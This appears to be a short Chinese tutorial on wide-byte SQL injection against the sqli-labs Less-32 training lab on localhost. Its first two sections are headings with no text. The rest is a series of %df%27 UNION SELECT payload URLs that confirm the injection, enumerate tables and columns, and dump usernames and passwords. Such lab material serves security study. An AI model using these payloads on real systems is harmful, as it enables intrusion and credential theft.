sql注入之寬字節注入

1. 寬字節注入的常見過濾函數

    

   

        

2.寬字節注入的條件

      

       

        

         

            

3.確定寬字節注入點

     http://127.0.0.1/sqli-labs-master/Less-32/?id=1%df%27

   

      http://127.0.0.1/sqli-labs-master/Less-32/?id=1%df%27-- +

   

 確定字符段

  http://127.0.0.1/sqli-labs-master/Less-32/?id=1%df%27 order by 3-- +

確定數據庫輸出的地方

  http://127.0.0.1/sqli-labs-master/Less-32/?id=0%df%27 union select 1,2,3-- +

   

爆出數據庫

  http://127.0.0.1/sqli-labs-master/Less-32/?id=0%df%27 union select 1,database(),3-- +

    

   查出表名

    http://127.0.0.1/sqli-labs-master/Less-32/?id=0%df%27 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3--+

爆出列名

  http://127.0.0.1/sqli-labs-master/Less-32/?id=0%df%27 union select 1,(select group_concat(column_name) from information_schema.columns where table_name=0x7573657273),3--+

爆出用戶名密碼

http://127.0.0.1/sqli-labs-master/Less-32/?id=0%df%27 union select 1,(select group_concat(username,0x7e,password) from users),3--+